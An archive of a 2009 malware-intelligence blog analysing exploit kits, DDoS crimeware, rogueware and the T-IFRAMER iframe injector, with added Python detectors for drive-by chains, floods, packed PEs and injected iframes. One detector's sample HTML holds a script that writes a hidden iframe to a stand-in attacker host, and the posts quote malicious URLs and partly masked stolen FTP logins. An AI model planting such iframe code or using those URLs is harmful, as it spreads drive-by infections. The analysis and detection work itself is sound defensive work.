Sunday, November 29, 2009

JustExploit. New Exploit kit that uses vulnerabilities in Java

The crimeware industry keeps growing, and with it the illegal marketing of web applications that seek to automate the infection process through the exploitation of vulnerabilities.

This time the offering is called JustExploit. It is a new exploit pack of Russian origin with an ingredient that crimeware developers are increasingly taking into account: the exploitation of vulnerabilities in Java. That is, in addition to exploiting known vulnerabilities in MDAC and in PDF readers, it exploits Java on every computer that has the runtime installed.

The screenshot of the statistics module (Intelligence) shows clearly that from this application a large number of computers are being controlled, running different browsers and different operating systems, among them the much-discussed Windows 7.

Another interesting fact that emerges from this module is the high effectiveness of the Java exploit, with an even greater success rate than the other two vulnerabilities (MDAC and PDF).

Through an index.php file containing an obfuscated script, JustExploit tries to run three exploits, for CVE-2008-2992 (Adobe Reader util.printf), CVE-2009-0927 (Adobe Reader getIcon) and CVE-2008-5353 (Java Calendar deserialization, which escapes the applet sandbox). Part of the script is shown below.

Among the downloaded files is the Java component, called sdfg.jar, which has a low detection rate: according to VirusTotal, only 15 of 41 antivirus engines flag it.

In addition, the kit downloads the following malicious files (which, for the moment, also have a very poor detection rate):

This activity has been In-the-Wild for a relatively short time and is a dangerous attack vector that botmasters are actively using, as we have seen, with striking effectiveness.
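The chain described above (a landing page, then the Java archive and the PDF carrying the exploits, then the payload) leaves a recognisable footprint in a web proxy log. The following is an added example, not code from the original post or from the kit: it looks for that footprint. The log lines are constructed, and their field layout (timestamp, client, method, URL, content type) is an assumption rather than any real proxy's schema; the host names kit.example, docs.example and news.example are illustrative.

```python
"""Hunt for JustExploit-style drive-by chains in web proxy logs.

Added example, not code from the original post or from the kit itself. The
log lines below are constructed and the field layout is an assumption.
"""
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlparse

# Constructed sample: 10.0.0.5 hits the full chain on kit.example;
# 10.0.0.9 only fetches an unrelated PDF; a later index.php on another
# host has no follow-on fetches and must not alert.
SAMPLE_LOG = """\
2009-11-29T10:00:01 10.0.0.5 GET http://kit.example/index.php text/html
2009-11-29T10:00:03 10.0.0.5 GET http://kit.example/sdfg.jar application/java-archive
2009-11-29T10:00:04 10.0.0.5 GET http://kit.example/egiz.pdf application/pdf
2009-11-29T10:00:09 10.0.0.5 GET http://kit.example/load.php?spl=java application/octet-stream
2009-11-29T10:01:00 10.0.0.9 GET http://docs.example/report.pdf application/pdf
2009-11-29T10:05:00 10.0.0.5 GET http://news.example/index.php text/html
"""

# Content types of the follow-on requests; which of them is followed by a
# payload fetch tells you which vector got the binary onto the box.
EXPLOIT_TYPES = {
    "application/java-archive": "java",
    "application/pdf": "pdf",
    "application/octet-stream": "payload",
}
WINDOW_SECONDS = 30


def parse_log(text):
    """Yield (timestamp, client, host, path, content_type) per log line."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url, ctype = line.split()
        parts = urlparse(url)
        yield datetime.fromisoformat(ts), client, parts.netloc, parts.path, ctype


def find_driveby_chains(text, window=WINDOW_SECONDS, min_vectors=2):
    """Alert when a client fetches an HTML page and, within `window` seconds,
    at least `min_vectors` exploit-carrier or payload responses from the same
    host. Returns one dict per landing page that started such a chain."""
    by_client_host = defaultdict(list)
    for ts, client, host, path, ctype in parse_log(text):
        by_client_host[(client, host)].append((ts, path, ctype))

    alerts = []
    for (client, host), events in by_client_host.items():
        events.sort()
        for i, (t0, path, ctype) in enumerate(events):
            if ctype != "text/html":
                continue
            vectors = {}
            for t1, path1, ctype1 in events[i + 1:]:
                if (t1 - t0).total_seconds() > window:
                    break
                if ctype1 in EXPLOIT_TYPES:
                    vectors[EXPLOIT_TYPES[ctype1]] = path1
            if len(vectors) >= min_vectors:
                alerts.append({"client": client, "host": host,
                               "landing": path, "vectors": vectors})
    return alerts


if __name__ == "__main__":
    for alert in find_driveby_chains(SAMPLE_LOG):
        print(f"{alert['client']} <- {alert['host']}{alert['landing']}: "
              f"{alert['vectors']}")
```

Keying on the client/host pair rather than on the URL is deliberate: kits rotate file names (the post notes random names elsewhere), but the landing page and its exploit files are served from the same host within seconds, which is the part that is hard for the attacker to change.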

Related information
DDoS Botnet. New particular-purpose crimewar...
T-IFRAMER. Kit for the injection of malware In-the...
ZoPAck. New alternative for the exploitation of v...
ZeuS Botnet and its zombie recruitment power
Eleonore Exploits Pack. New crimeware In-the-Wild
Looking closely at the structure of Unique Sploits Pack
Adrenaline botnet: command zone. The Russian crimeware...
YES Exploit System. Another crimeware made in Russia
Barracuda Bot. Botnet actively exploited
ElFiesta. Zombie recruitment through multiple threats

Jorge Mieres
Pistus Malware Intelligence

Tuesday, November 24, 2009

Espionage by malware

This month I recall waking up to a piece of news that, for many media outlets, seemed new or belonging exclusively to Hollywood films, which gave it a connotation of "amazing": espionage by computer means.

Below is a screenshot of the news item, which makes it evident that malicious code is also part of intelligence operations in different contexts, both from a clearly fraudulent standpoint (in the case of computer criminals) and under the "flag" of protecting and safeguarding the interests of a State (for many intelligence services), which seek to exploit and/or neutralize potential actions framed in a context of hostility.

Indeed, in many cases these actions border on the limits of legality.

According to the article, Israel's main intelligence service (Mossad) used a trojan-type malicious program to obtain confidential and critical information on nuclear facilities in Syria.

That Mossad used a program to spy is nothing new: like its American counterpart (the CIA) and many others, it previously used PROMIS as a spying resource.

(Some day I may get around to writing something about the programs used by intelligence services around the world ;P)

The point is that, regardless of the impact of the news, malicious code is without doubt one of the most used resources for obtaining information, including at the government and military level, and even among companies seeking confidential data that reveals a competitor's activities and gives them a competitive advantage.

Now, any organization or government entity can be a victim of espionage, and these activities must also be addressed by information security. As for what can be done to counter or neutralize activities that in most cases operate on the edge of illegality, the truth is that it isn't easy. However, implementing a disinformation strategy can be good counterintelligence practice.

Ultimately it's easy to deduce that such maneuvers are not only the stuff of "ghosts" or of the science-fiction film genre; every day we are potential victims of the persistent attempts of malware writers seeking to breach our security frameworks to obtain secret information.

Related information
Computer Intelligence, Information Security and Cyber-War
CYBINT in the business of Russian cyber-crooks

Jorge Mieres
Pistus Malware Intelligence

Monday, November 23, 2009

DDoS Botnet. New particular-purpose crimeware

A Denial of Service (DoS) attack consists basically of abusing a service or resource through successive requests, whether intentional or negligent, that end up breaking the availability of that service or resource, temporarily or completely.

When this type of attack is carried out using the processing power of a large set of computers that perform the abusive requests simultaneously, we are witnessing a Distributed Denial of Service (DDoS) attack.

DDoS attacks are nothing new (the Blaster worm, designed in 2003 to carry out this type of attack against Microsoft, is a classic example), and they are a resource used in malicious activity of every stripe, including organized crime.

In this sense, most general-purpose botnets include distributed denial-of-service attacks as part of their criminal offering, taking advantage of the capacity of the zombies that make up the network; and particular-purpose botnets, built to carry out one specific type of attack against one specific target, are also typical today.

From a cyber-war perspective, DDoS also plays a fundamental role in the offensive side of this digital war, also known as Cyber-Warfare, and is a resource that forms part of the attack-analysis strategy of CYBINT (Cyber Intelligence).

However, in this scenario the attack may also be used defensively, as an analytical strategy to assess the limits of a State's critical services.

But whatever purposes hide behind the attack, cyber-criminals (especially those of Russian origin) constantly seek to make it easier by offering crimeware developed for exclusively criminal use.

The point is that a new web application for controlling botnets is In-the-Wild, marketed on the Russian black market at a "competitive" price: USD 350.

The crimeware is designed to recruit and train a botnet of zombies (particular purpose) intended exclusively for DDoS attacks of the types SYN Flood, ICMP Flood, UDP Flood, HTTP Flood and HTTPS Flood. The following screenshot shows part of the configuration of the application, which is written in PHP.
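What the flood types listed above look like from the receiving side is worth making concrete: a SYN flood is many SYN-only segments to one target from sources that never complete the handshake (they are usually spoofed), while UDP and ICMP floods are simply packet rate against one target. The following is an added example, not code from the original post or from the crimeware it describes; it applies those two tests to per-packet summary records. The record layout (timestamp, source, destination, protocol, TCP flags), the addresses and every threshold are constructed assumptions, not tuned values.

```python
"""Flag SYN, UDP and ICMP flood patterns in per-packet summary records.

Added example, not code from the original post or from the crimeware it
describes. Record layout, addresses and thresholds are constructed.
"""
from collections import defaultdict

WINDOW = 1.0           # seconds per bucket
SYN_THRESHOLD = 100    # SYN-only packets per bucket per target
RATE_THRESHOLD = 100   # UDP/ICMP packets per bucket per target
MAX_COMPLETION = 0.1   # fraction of SYN senders that went on to send a bare ACK


def build_sample():
    """Constructed traffic: one spoofed SYN flood, one UDP flood, and normal
    handshakes (SYN, SYN/ACK from the server, ACK from the client)."""
    recs = []
    for i in range(200):                       # 200 SYNs from 50 sources in 0.8 s
        recs.append((0.004 * i, f"198.51.100.{i % 50}", "203.0.113.10", "tcp", "S"))
    for i in range(20):                        # 20 legitimate handshakes, 1 per second
        t = 5.0 + i
        recs.append((t, "192.0.2.7", "203.0.113.20", "tcp", "S"))
        recs.append((t + 0.1, "203.0.113.20", "192.0.2.7", "tcp", "SA"))
        recs.append((t + 0.2, "192.0.2.7", "203.0.113.20", "tcp", "A"))
    for i in range(150):                       # 150 UDP packets in 0.15 s
        recs.append((30.0 + 0.001 * i, "198.51.100.99", "203.0.113.30", "udp", ""))
    for i in range(10):                        # a few pings, not a flood
        recs.append((40.0 + 0.01 * i, "192.0.2.8", "203.0.113.30", "icmp", ""))
    return recs


def detect_floods(records, window=WINDOW):
    """Return a list of alert dicts, one per (bucket, target, kind)."""
    syn_senders = defaultdict(set)   # (bucket, dst) -> sources that sent SYN
    syn_count = defaultdict(int)     # (bucket, dst) -> SYN-only packets
    ack_senders = defaultdict(set)   # (bucket, dst) -> sources that sent bare ACK
    rate = defaultdict(int)          # (bucket, dst, proto) -> packets
    for ts, src, dst, proto, flags in records:
        bucket = int(ts // window)
        if proto == "tcp":
            if flags == "S":
                syn_senders[(bucket, dst)].add(src)
                syn_count[(bucket, dst)] += 1
            elif flags == "A":
                ack_senders[(bucket, dst)].add(src)
        elif proto in ("udp", "icmp"):
            rate[(bucket, dst, proto)] += 1

    alerts = []
    for key, n in syn_count.items():
        if n < SYN_THRESHOLD:
            continue
        # Spoofed sources never see the SYN/ACK, so no bare ACK ever follows.
        senders = syn_senders[key]
        completed = len(senders & ack_senders[key])
        if completed / len(senders) <= MAX_COMPLETION:
            alerts.append({"bucket": key[0], "dst": key[1], "kind": "syn_flood",
                           "syns": n, "sources": len(senders),
                           "completed": completed})
    for (bucket, dst, proto), n in rate.items():
        if n >= RATE_THRESHOLD:
            alerts.append({"bucket": bucket, "dst": dst,
                           "kind": f"{proto}_flood", "packets": n})
    return alerts


if __name__ == "__main__":
    for alert in detect_floods(build_sample()):
        print(alert)
```

The completion ratio is what separates a SYN flood from a legitimate burst (a popular page going live also produces many SYNs, but those clients finish the handshake). HTTP/HTTPS floods, the other two modes the kit offers, complete the handshake by design and need request-level counting instead, which this packet-level view cannot give.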

Among its notable features are the ability to run as a service (part of its self-defence strategy), command and control (C&C) over HTTP, integration with other crimeware of its kind, and logging of activity with processed information on each attack (Intelligence), among many others.

I believe that research into this type of criminal activity must have the methodical touch that intelligence work offers, because although for a home user this type of attack may matter little, it isn't the case when what is at stake are a company's assets. As security professionals we should be aware of the state of the art in crimeware and incorporate intelligence measures into our work.

Related information
Russian crimeware prices. Part 2
Russian Trade crimeware private versions ...
ZeuS Botnet and its zombie recruitment power
Automating anti-analysis processes II
Eleonore Exploits Pack. New Crimeware In-the-Wild
Looking closely at the structure of Unique Sploits Pack
Adrenaline botnet: command zone. The Russian crimeware...
YES Exploit System. Another crimeware Made in Russia
Barracuda Bot. Botnet actively exploited
ElFiesta. Zombie recruitment through multiple threats

Jorge Mieres
Pistus Malware Intelligence Blog

Friday, November 20, 2009

Is this a Rogueware?

While looking through MySharewareSite.com, I found the following tool and decided to dig up more information about it.



When trying to click on the following site links:
hxxp://w w w.internetsecurity2.com/?id=avanquest_system_suite
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]
hxxp://w w w.internetsecurity2.com/shots/avanquest_system_suite.gif
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]
hxxp://w w w.internetsecurity2.com/suites/avanquest_system_suite_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

When throwing it into JSunpack we received the following response:

Sections ( CODE .rsrc )
File: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit, PECompact2 compressed
Packer: PECompact V2.X-> Bitsum Technologies,PECompact 2.xx --> BitSum Technologies,ExeShield Protector V3.6 -> www.exeshield.com,
Size: 193536 bytes,
MD5: 161f2a3e3c41dbd451021a3cc1fd2577

Based on the MD5, VirusTotal gave the following results:

LINK: http://www.virustotal.com/analisis/6bba141f45e25ea9c5cbdf910310114de7be4f97ce7572976a1b1c4c5f1ec6dc-1251400950



PrevX had a report for the same MD5:
http://info.prevx.com/aboutprogramtext.asp?PX5=48A52DBD003CF3E7F47D02C51A2AB30007864133

File size: 193536 bytes
MD5 : 161f2a3e3c41dbd451021a3cc1fd2577
SHA1 : 7fb29202fab964bcd48f1b5309021876e5175784
SHA256: 6bba141f45e25ea9c5cbdf910310114de7be4f97ce7572976a1b1c4c5f1ec6dc
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x1000
timedatestamp.....: 0x2A425E19 (Sat Jun 20 00:22:17 1992)
machinetype.......: 0x14C (Intel I386)

( 2 sections )
name viradd virsiz rawdsiz ntrpy md5
CODE 0x1000 0x80000 0x2A200 8.00 414b946f666a25e9a9ead73ea1dd1403
.rsrc 0x81000 0x5000 0x4E00 5.21 6d690ad7615832e8c76b28a3f017c377

( 11 imports )

> advapi32.dll: RegQueryValueExA
> comctl32.dll: ImageList_SetIconSize
> gdi32.dll: UnrealizeObject
> kernel32.dll: LoadLibraryA, GetProcAddress, VirtualAlloc, VirtualFree
> ole32.dll: CreateStreamOnHGlobal
> oleaut32.dll: SysFreeString
> shell32.dll: ShellExecuteA
> urlmon.dll: URLDownloadToFileA
> user32.dll: GetKeyboardType
> version.dll: VerQueryValueA
> wininet.dll: DeleteUrlCacheGroup
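The PEInfo dump above already tells a reviewer most of the story: a CODE section with entropy 8.00 whose raw data (0x2A200 bytes) is far smaller than its virtual size (0x80000) is the signature of a runtime packer such as the PECompact the identifier reports; an import table reduced to LoadLibraryA and GetProcAddress plus URLDownloadToFileA and ShellExecuteA is exactly what a "web installer" that downloads and runs a second stage needs; and the 1992 timestamp 0x2A425E19 is the fixed value the Borland/Delphi linker writes, so it identifies the toolchain rather than proving tampering. The following is an added example, not code from the original post or from VirusTotal, PrevX or any other tool named here: it reproduces those checks with the standard library only. The PE it builds is synthetic and merely shaped like the dump above (it has no optional header and Windows would not load it); it is not the sample from the post.

```python
"""Minimal PE triage: section entropy, raw versus virtual size, timestamp
sanity and a look at the import names.

Added example, not code from the original post or any tool it mentions.
build_sample_pe() constructs a synthetic PE shaped like the dump above.
"""
import math
import random
import struct
import time

DOS_MAGIC = b"MZ"
PE_MAGIC = b"PE\0\0"
DELPHI_TIMESTAMP = 0x2A425E19   # fixed value written by the Borland/Delphi linker


def shannon_entropy(data):
    """Bits per byte: 0.0 for empty input, close to 8.0 for random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data):
    """Return machine, TimeDateStamp and the section table with raw entropy."""
    if data[:2] != DOS_MAGIC:
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != PE_MAGIC:
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsec, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    table = coff + 20 + opt_size              # section headers follow the optional header
    sections = []
    for i in range(nsec):
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, table + 40 * i)
        raw = data[rawptr:rawptr + rawsize]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "vaddr": vaddr, "rawsize": rawsize,
                         "entropy": shannon_entropy(raw)})
    return {"machine": machine, "timestamp": timestamp, "sections": sections}


def triage(report, imports=(), now=None):
    """Heuristic flags; `imports` is the list of imported function names."""
    flags = []
    ts = report["timestamp"]
    now = time.time() if now is None else now
    if ts == DELPHI_TIMESTAMP:
        flags.append("delphi_fixed_timestamp")    # identifies the toolchain, not tampering
    elif ts < 788918400 or ts > now:              # before 1995 or in the future: forged
        flags.append("implausible_timestamp")
    for s in report["sections"]:
        if s["entropy"] >= 7.0:                   # compressed or encrypted content
            flags.append("high_entropy:" + s["name"])
        if s["rawsize"] and s["vsize"] > 2 * s["rawsize"]:   # room to unpack in place
            flags.append("unpacks_in_place:" + s["name"])
    names = {fn.lower() for fn in imports}
    if {"urldownloadtofilea", "shellexecutea"} <= names:
        flags.append("download_and_execute_imports")
    if {"loadlibrarya", "getprocaddress"} <= names and len(names) < 20:
        flags.append("thin_import_table")         # the stub resolves the rest at runtime
    return flags


def build_sample_pe():
    """Constructed PE: random-looking CODE far smaller on disk than in memory,
    an all-zero .rsrc, the Delphi timestamp and no optional header (size 0)."""
    rng = random.Random(7)
    code_raw = bytes(rng.randrange(256) for _ in range(4096))
    rsrc_raw = b"\0" * 0x4E00
    e_lfanew = 64
    dos = DOS_MAGIC + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 2, DELPHI_TIMESTAMP, 0, 0, 0, 0x0102)
    code_ptr = e_lfanew + 4 + 20 + 2 * 40     # data starts right after two section headers

    def section(name, vsize, vaddr, raw, ptr):
        return struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, len(raw), ptr, 0, 0, 0, 0, 0x60000020)

    image = dos + PE_MAGIC + coff
    image += section(b"CODE", 0x80000, 0x1000, code_raw, code_ptr)
    image += section(b".rsrc", 0x5000, 0x81000, rsrc_raw, code_ptr + len(code_raw))
    return image + code_raw + rsrc_raw


# The import names listed in the PEInfo dump above.
PAGE_IMPORTS = ["RegQueryValueExA", "ImageList_SetIconSize", "UnrealizeObject",
                "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualFree",
                "CreateStreamOnHGlobal", "SysFreeString", "ShellExecuteA",
                "URLDownloadToFileA", "GetKeyboardType", "VerQueryValueA",
                "DeleteUrlCacheGroup"]

if __name__ == "__main__":
    print(triage(parse_pe(build_sample_pe()), PAGE_IMPORTS))
```

None of these flags is a verdict on its own (legitimate Delphi installers are packed too); what makes the case here is the combination with the site it came from and the multi-vendor detections listed below.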

When opening the site in Firefox v3.0.15, I got the following response. It is good that Firefox caught this:



Norton Safeweb gives the following results:



DIRECT LINK: http://safeweb.norton.com/report/show?url=http%3A%2F%2Fwww.internetsecurity2.com%2F%3Fid%3Davanquest_system_suite&x=15&y=12

[COPIED AND PASTED FROM ABOVE REPORT, JUST IN CASE THE ABOVE LINK FAILED]
Threat Report

Total threats found: 11

Viruses

Threats found: 10
Here is a complete list:
Threat Name: Downloader
Location: hxxp://www.internetsecurity2.com/suites/avanquest_system_suite_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Downloader
Location: hxxp://www.internetsecurity2.com/suites/trendmicro_internet_security_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Downloader
Location: hxxp://www.internetsecurity2.com/suites/registry_sweep_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Downloader
Location: hxxp://www.internetsecurity2.com/suites/kaspersky_internet_security_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Trojan Horse
Location: hxxp://www.internetsecurity2.com/suites/zonealarm_internet_security_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Downloader
Location: hxxp://www.internetsecurity2.com/suites/norton_internet_security_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Suspicious.MH690
Location: hxxp://www.internetsecurity2.com/suites/registry_easy_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Downloader
Location: hxxp://www.internetsecurity2.com/suites/panda_internet_security_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Suspicious.MH690
Location: hxxp://www.internetsecurity2.com/suites/ca_internet_security_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Threat Name: Suspicious.MH690
Location: hxxp://www.internetsecurity2.com/suites/registry_cure_webinstaller.exe
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

Security Risks

Threats found: 1
Here is a complete list:
Threat Name: HTTP Malicious Toolkit Variant Activity
Location: hxxp://www.internetsecurity2.com/
[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]

DNS Graph, DNS Records and DNS Analysis Report (screenshots not reproduced here).
Conclusion:
In conclusion, the site it is being hosted on, internetsecurity2.com, hosts many malicious binaries, as listed above. Watch what you download, and never think that hash listings are only for geeks: all of the above data was derived solely from the MD5 of the EXE.

I couldn't load the EXE into Anubis, as Anubis is having heavy delays for some reason. But if you have any further analysis you wish to share with us, that would be awesome. Contact us at contact.fingers @ gmail. com if you have any queries or concerns.


- EF

Wednesday, November 18, 2009

A tour of the latest scareware XVIII

Virus Protector = AntiAID, SystemVeteran, BlockProtector, SystemWarrior
IP: 85.12.25.111, 83.233.30.66
Netherlands, Eindhoven, Web10 Ict Services
Sweden, Stockholm, Serverconnect I Norrland
Associated domains
antiaid.com
blockkeeper.com
blockprotector.com
systemveteran.com

Pope Green Defender
IP: 99.198.98.217
United States, Chicago, Singlehop Inc
Associated domains
popegreen.com

Spyware Defender 2009
IP: 99.198.98.218
United States, Chicago, Singlehop Inc
Associated domains
cheelumtech.com

Pro Defender 2008
IP: 99.198.98.202
United States, Chicago, Singlehop Inc
Associated domains
vlachosoft.com

Proof Defender
IP: 76.76.101.85
United States, Portland, Donald Wildes
Associated domains
proofdefender.com
proofdefender2009.com
www.pdefender2009.com
www.proofdefender.com

techno-rescue.com (209.8.45.117) United States, Herndon, Beyond The Network America
besttoolsdirect.com (193.169.234.3) Jamaica, Titan-net Ltd
rfastnet.com/online (213.155.22.193) Ukraine, Kiev, Singhajeet3 - Singh Ajeet
advanced-virus-remover2010.com (91.207.116.55) Ukraine, Czech Republic Of Rays
10-open-davinci.com
advanced-virus-remover2010.com
advanced-virusremover-2009.com
advanced-virusremover2009.com
advancedvirus-remover-2010.com
advancedvirusremover-2009.com
best-scan-pc.com
best-scan-pc.net
best-scan.com
best-scanpc.com
best-scanpc.net
best-scanpc.org
cathrynzfunz.com
coolcount1.com
downloadavr6.com
downloadavr7.com
downloadavr8.com
hard-xxx-tube.com
testavrdown.com
testavrdownnew.com
vsproject.net
www.advanced-virus-remover-2009.com
www.advancedvirus-remover2009.com
www.advancedvirusremover-2009.com
www.best-scan-pc.com
www.best-scanpc.net
www.best-scanpc.org
www.hard-xxx-tube.com
www.onlinescanxppro.com
xxx-white-tube.net
xxx-white-tube.org
argentmarketingtools.com (194.60.205.20) Russian Federation, Baltic Center Of Innovations Techprominvest Ltd
thetoolsbargain.com, bestalltools.com (62.90.136.210) Israel, Haifa, Loads

Related information
A tour of the latest scareware XVII
A tour of the latest scareware XVI
A tour of the latest scareware XV
A tour of the latest scareware XIV
A tour of the latest scareware XIII
A tour of the latest scareware XII
A tour of the latest scareware XI
A tour of the latest scareware X
A tour of the latest scareware IX
A tour of the latest scareware VIII
A tour of the latest scareware VII
A tour of the latest scareware VI
A tour of the latest scareware V
A tour of the latest scareware IV
A tour of the latest scareware III
A tour of the latest scareware II
A tour of the latest scareware I

Jorge Mieres
Pistus Malware Intelligence Blog

Sunday, November 15, 2009

T-IFRAMER. Kit for the injection of malware In-the-Wild

T-IFRAMER is a package that allows automating, centralizing and managing over HTTP the spread of malicious code by injecting iframe tags into compromised websites, and feeding a botnet. Below is a screen capture of its authentication page.

Although it isn't a complex kit, it lets computer criminals manage the spread of malware over HTTP through Drive-by-Download and Drive-by-Injection attacks, by inserting iframe tags into compromised web pages.

It has four key modules, Stats, Manager, Iframes and Injector, each with the main function of optimizing the spread of malware.

The first (Stats) manages the compromised FTP accounts, giving control over them with the ability to upload files. This is how one of the cycles of malicious code propagation begins.

The management module has several categories, among them:
  • Iframe accounts. Pages that have had malicious scripts injected through the iframe tag.
  • Not Iframe. Basically compromised FTP accounts. In this case several FTP accounts were stored, among them (addresses partially masked):
ftp://distribs:softXP@193.xxx.xxx.66
ftp://tools:softXP@193.xxx.xxx.66
ftp://NST:124@80.xxx.xxx.179
  • Good accounts. Lets you set which compromised FTP accounts are useful or still active.
  • Freehosts accounts. Lists all the compromised FTP sites that are hosted on free hosting.
  • Unchecked accounts. Accounts that haven't yet been reviewed.
The following screenshots show two of the compromised FTP servers. On each of them any kind of content can be stored (warez, cracks, pornography, phishing, child abuse material, any type of malware). The first belongs to a software house and the second is a mirror for downloading *NIX-based distributions.



The Manager module is itself a panel that allows administering each of the above categories, including the ability to delete an FTP record directly.

So far, these first modules deal with everything related to account management. However, it doesn't end there, and the following modules are more aggressive.

One is the Iframes module. It allows setting the attack strategy through iframe tags, hiding them (as usual) in a script. In this case, the script used http://flo4.cn/1.txt as its URL.

In turn, that URL references another URL which, in this case, contains an obfuscated script with multiple exploits and malware that is downloaded automatically.

In this instance, after trying to run the exploits, it redirects to the domain http://www.google.ru, apparently manipulating the returned search results.

The exploits it carries are the following:
The malicious code that is downloaded is:
  • ehkruz1.exe. A trojan designed to capture information related to the WebMoney service; to date it has a low detection rate, only 6 of 41 antivirus engines. The filename is random.
  • egiz.pdf. Contains exploits (CVE-2007-5659, CVE-2008-2992 and CVE-2009-0927) with a low detection rate, 7/41 (17.07%). Downloads the binary.
  • manual.swf. Contains an exploit. Its detection rate is medium-low, 15/41 (36.59%).
  • sdfg.jar. A trojan downloader with an exploit. Its detection rate is medium-low, 14/41 (34.15%).
  • ghknpxds.jpg. Contains an exploit. Its detection rate is very low, 4/41 (9.76%).
The Injector module is responsible for the iframe injection itself, using the code created in the previous module, and lets you configure a number of parameters to optimize the attack: for example, it allows checking PageRank, injecting code and cleaning it up if necessary, checking the hosting country and the FTP accounts, establishing which domains to attack (1st and 2nd level, both configurable), and configuring regular expressions with the names of folders and files commonly found on a web server, among others.
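The defender's side of the Iframes and Injector modules is finding what they left behind: an iframe sized or styled to be invisible that points off-site, or an iframe written from a script (the usual hiding place), often assembled from escaped text so that the string "<iframe" never appears in the file. The following is an added example, not code from the original post or from T-IFRAMER; it scans page HTML pulled from a web root for both forms. The HTML is constructed: flo4.cn is the URL the post names, while www.example-site.org and attacker.example are illustrative.

```python
"""Find injected, hidden iframes on pages pulled from a compromised web root.

Added example, not code from the original post or from T-IFRAMER. The HTML
below is constructed; only flo4.cn comes from the post.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d", re.I)
SCRIPT_IFRAME = re.compile(r"<iframe[^>]*?src\s*=\s*[\"']?([^\"'\s>]+)", re.I)
JS_ESCAPED_LT = re.compile(r"\\x3c|\\u003c", re.I)

SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="http://www.example-site.org/ads.html" width="300" height="250"></iframe>
<iframe src="http://flo4.cn/1.txt" width="1" height="1" style="visibility:hidden"></iframe>
<script type="text/javascript">
document.write(unescape('%3Ciframe src=%22http://attacker.example/in.php%22 width=0 height=0%3E%3C/iframe%3E'));
</script>
</body></html>
"""


class IframeCollector(HTMLParser):
    """Collect iframe tag attributes and the raw text of every <script>."""
    def __init__(self):
        super().__init__()
        self.iframes, self.scripts, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def _tiny(value):
    """True for a width/height of 2px or less (the classic 1x1 / 0x0 frame)."""
    try:
        return int(str(value).rstrip("px")) <= 2
    except ValueError:
        return False


def is_hidden(attrs):
    return (_tiny(attrs.get("width")) or _tiny(attrs.get("height"))
            or bool(HIDDEN_STYLE.search(attrs.get("style") or "")))


def find_injected_iframes(html, site_host):
    """Return off-site iframes that are hidden or generated from script.
    site_host is the legitimate host of the page being examined."""
    parser = IframeCollector()
    parser.feed(html)
    hits = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        host = urlparse(src).netloc
        if host and host != site_host and is_hidden(attrs):
            hits.append({"src": src, "how": "hidden_iframe_tag"})
    for body in parser.scripts:
        # undo unescape()/%XX and \x3c-style hiding before looking for the tag
        decoded = JS_ESCAPED_LT.sub("<", unquote(body))
        for match in SCRIPT_IFRAME.finditer(decoded):
            src = match.group(1)
            host = urlparse(src).netloc
            if host and host != site_host:
                hits.append({"src": src, "how": "iframe_from_script"})
    return hits


if __name__ == "__main__":
    for hit in find_injected_iframes(SAMPLE_HTML, "www.example-site.org"):
        print(hit)
```

Run it over every HTML and PHP file in the web root and diff the hits against a known-good copy; since the kit writes through FTP, the file modification times of the hits will also cluster around the moment the stolen account was used, which is the second artifact to collect.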

Investigating the domains involved a little more, it is obvious that this application is being used as a "support" tool for a known crimeware that we have discussed on this blog: the latest Fragus.

That is, the domain "hidden" between the iframe tags redirects to a new URL from which a battery of exploits is thrown at potentially vulnerable computers, with the aim of downloading the malware responsible for recruiting the zombie.

T-IFRAMER has two distinct parts: on one hand administration, and on the other the attack, in addition, obviously, to continuing to feed the botnet. It's clear that those behind this type of crimeware know exactly what they want and, although the application's development is very simple, it's effective enough to be used by one of the most effective botnets today, Fragus.

